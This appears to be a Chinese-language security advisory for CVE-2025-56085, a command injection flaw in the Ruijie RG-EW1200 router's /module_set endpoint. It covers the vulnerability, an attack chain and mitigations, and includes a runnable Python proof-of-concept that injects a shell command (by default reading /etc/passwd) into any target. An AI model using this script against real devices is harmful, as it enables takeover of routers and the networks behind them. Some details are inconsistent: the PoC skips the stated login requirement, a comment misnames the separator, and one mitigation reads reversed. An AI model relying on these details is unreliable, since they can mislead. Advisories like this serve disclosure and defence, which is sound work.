CVE-2025-56085 | 锐捷RG-EW1200路由器OS命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-56085

漏洞类型

OS命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

锐捷RG-EW1200路由器（固件版本EW_3.0(1)B11P227_EW1200_11130208RG-EW1200 V1.00）

漏洞概述

CVE-2025-56085是锐捷网络（Ruijie）RG-EW1200路由器中存在的一个高危操作系统命令注入漏洞。该漏洞位于设备的Web管理界面，攻击者可以通过向/module_set端点发送精心构造的POST请求，在服务器端执行任意操作系统命令。漏洞的根本原因在于应用程序对用户输入缺乏有效的安全过滤和验证，攻击者可以在HTTP请求参数中注入恶意命令。由于该漏洞可通过网络远程利用，且只需要低权限认证即可实施攻击，因此具有极高的安全风险。成功利用此漏洞的攻击者可以完全控制受影响的路由器设备，执行任意代码、安装后门、窃取网络流量或将其纳入僵尸网络。RG-EW1200是一款面向家庭和小型办公环境的无线双频路由器，被广泛应用于企业网络中，其安全性直接影响大量用户的网络环境。

技术细节

该漏洞是一个典型的操作系统命令注入（OS Command Injection）漏洞，存在于Ruijie RG-EW1200路由器的Web管理功能中。具体来说，漏洞位于处理module_set请求的Lua脚本文件/usr/local/lua/dev_config/config_retain.lua。攻击者可以通过构造包含恶意命令的POST请求参数，在服务器端未经过滤地将用户输入传递给系统命令执行函数（如os.execute()或io.popen()）。攻击者可以利用管道符（如|、;、&&、||）或反引号（`）等命令连接符，在原有命令基础上注入额外的操作系统命令。例如，攻击者可以在参数值中插入分号后跟任意系统命令（如cat /etc/passwd），这些命令将与原始命令一起执行。由于路由器通常以root权限运行Web服务，攻击者注入的命令将以最高权限执行，从而实现对设备的完全控制。攻击者可以利用此漏洞读取敏感配置文件、修改路由器设置、植入持久化后门或进行横向移动攻击内网中的其他设备。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标Ruijie RG-EW1200路由器，获取其IP地址和管理界面访问地址

STEP 2

步骤2

认证获取：攻击者获取路由器Web管理界面的低权限账户（默认凭证或已泄露凭证）

STEP 3

步骤3

构造恶意请求：攻击者构造包含命令注入payload的POST请求，目标端点为/module_set

STEP 4

步骤4

发送攻击包：通过HTTP POST请求将恶意payload发送到/usr/local/lua/dev_config/config_retain.lua脚本

STEP 5

步骤5

命令执行：服务器端Lua脚本未对用户输入进行过滤，注入的命令随系统命令一起执行

STEP 6

步骤6

获取控制权：攻击者成功执行任意系统命令，可读取敏感信息、修改配置或植入后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-56085 PoC - Ruijie RG-EW1200 OS Command Injection
Target: /usr/local/lua/dev_config/config_retain.lua
Module: module_set endpoint
"""

import requests
import argparse
import sys

def exploit(target_ip, target_port=80, cmd='cat /etc/passwd'):
    """
    Exploit OS Command Injection in Ruijie RG-EW1200
    """
    url = f"http://{target_ip}:{target_port}/module_set"
    
    # Prepare malicious payload with command injection
    payload = {
        'module': 'config_retain',
        'action': 'set',
        # Inject command using pipe separator
        'param': f';{cmd}'
    }
    
    try:
        print(f"[*] Sending exploit to {url}")
        print(f"[*] Injected command: {cmd}")
        
        response = requests.post(url, data=payload, timeout=10)
        
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response Body:\n{response.text}")
        
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2025-56085 PoC')
    parser.add_argument('target', help='Target IP address')
    parser.add_argument('-p', '--port', type=int, default=80, help='Target port')
    parser.add_argument('-c', '--cmd', default='cat /etc/passwd', help='Command to execute')
    
    args = parser.parse_args()
    exploit(args.target, args.port, args.cmd)

影响范围

Ruijie RG-EW1200 EW_3.0(1)B11P227_EW1200_11130208RG-EW1200 V1.00

防御指南

临时缓解措施

在厂商发布正式安全更新之前，建议采取以下临时缓解措施：1）立即修改路由器默认管理密码；2）禁用路由器的WAN口远程管理功能，仅允许通过LAN口本地访问；3）在防火墙中限制对路由器管理端口（80/443）的访问，仅允许受信任的IP地址；4）监控路由器日志关注异常的POST请求和命令执行行为；5）考虑使用VPN建立安全的管理通道；6）评估是否需要更换为已停止支持的老旧设备。